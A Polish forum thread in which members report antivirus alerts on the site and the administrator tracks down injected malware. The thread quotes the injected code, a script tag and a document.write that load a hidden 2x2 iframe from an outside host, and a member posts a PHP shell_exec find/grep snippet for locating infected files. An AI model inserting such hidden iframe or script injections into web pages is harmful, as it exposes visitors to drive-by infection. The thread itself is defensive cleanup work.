co za syf na tym forum?
Moderators: Creeping Death, Edi, chmiel
co za syf na tym forum?
Czy wam też anty wirus pokazuje cały czas info o złośliwym oprogramowaniu?
Dbajmy by drzewa rosły jak najdłużej, bo kiedyś zrobią z nich dla Nas trumny
"Cichy potok - budzi się, Orzeł straż swą zaczyna
Taka cisza - taniec barw, Nad uśpioną doliną "
http://picasaweb.google.pl/darekab/
"Cichy potok - budzi się, Orzeł straż swą zaczyna
Taka cisza - taniec barw, Nad uśpioną doliną "
http://picasaweb.google.pl/darekab/
a co pokazuje dokladnie?
nie wiem co tu zlosliwego moglo sie podlaczyc..
nie wiem co tu zlosliwego moglo sie podlaczyc..
Niezly sen...: http://www.a-trip.com/tracks/view/63930
fucktycznie cos sie dokleilo, usunelem, ale podobno wraca jak bumerang. ;)
dawac znak jak nie ok, ale najpierw wyczysccie cache.
dawac znak jak nie ok, ale najpierw wyczysccie cache.
Niezly sen...: http://www.a-trip.com/tracks/view/63930
cały czas wyskakuje
URL: http://otwock.org.pl//relacje/2002.korsy...
Proces: file://C:\Program Files\Mozilla Firefox\...
Infekcja: html:Iframe-inf
URL: http://otwock.org.pl//relacje/2002.korsy...
Proces: file://C:\Program Files\Mozilla Firefox\...
Infekcja: html:Iframe-inf
a teraz? ;)
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
Niezly sen...: http://www.a-trip.com/tracks/view/63930
Chyba wszedzie w forum z automatu dokleja to:behem0th wrote:a teraz?
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
Code: Select all
tuz za <body> i </body>
script type="text/javascript" language="javascript" src="http://otwock.org.pl//relacje/2002.korsyka/arlesimages/jquery.ui.accordion.min.js" ></script
Code: Select all
document.write('iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe');
Anonymous wrote:Albo zrób tak:behem0th wrote:a teraz?
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
do pliku np szukaj_intruza.php wstaw kod:
i wywolaj go z przegladarki - byc moze zadziala - przeszukuje pliki php na string "accordion" Jesli chcesz przeszukac inne typy zamien -name "*.php" na np -name "*.tpl" itd albo usun wogole wtedy bedzie szukac wszystkoCode: Select all
TAG PRE <?php $cmd = 'find . -type f -name "*.php" -exec grep -H -A2 -B2 "accordion" {} \;'; echo $cmd; echo shell_exec($cmd);
Na wyjsciu bedziesz mial nazwe pliku, nr linii i fragment kodu w kontekscie 2 linii przed i za znalezionym fragmentem
co za ch.. drugiego sajta tez przyatakowalo.
wcina sie w .httaccess, pliki php i baze tyle ze jak to usune to znow zaraz sie pojawi pewnie..
dzieki za pomoc, pewnie bedzie potrzebna docelowo ;)
wcina sie w .httaccess, pliki php i baze tyle ze jak to usune to znow zaraz sie pojawi pewnie..
dzieki za pomoc, pewnie bedzie potrzebna docelowo ;)
Niezly sen...: http://www.a-trip.com/tracks/view/63930
- Giant Mike
- Mam zdecydowanie za duzo czasu...
- Posts: 898
- Joined: 20 Apr 2005 19:41
- Location: Warszał
- Contact:
hmmmm ... a te pliki nie powinny być RO ?behem0th wrote:co za ch.. drugiego sajta tez przyatakowalo.
wcina sie w .httaccess, pliki php i baze tyle ze jak to usune to znow zaraz sie pojawi pewnie..
dzieki za pomoc, pewnie bedzie potrzebna docelowo
Michał
Plannja Racing Team || GG#: 130876
atrybuty sa ok, podobno trojan przechwytuje hasla i wchodzi jako wlasciciel, ostatnio mialem infekcje jakiegos syfu wiec by sie zgadzalo, jak tylko sobie przypmne i zmienie na nowe to bedzie dobrze. dorwalem logi, ftpa bedzie czystka :)
Niezly sen...: http://www.a-trip.com/tracks/view/63930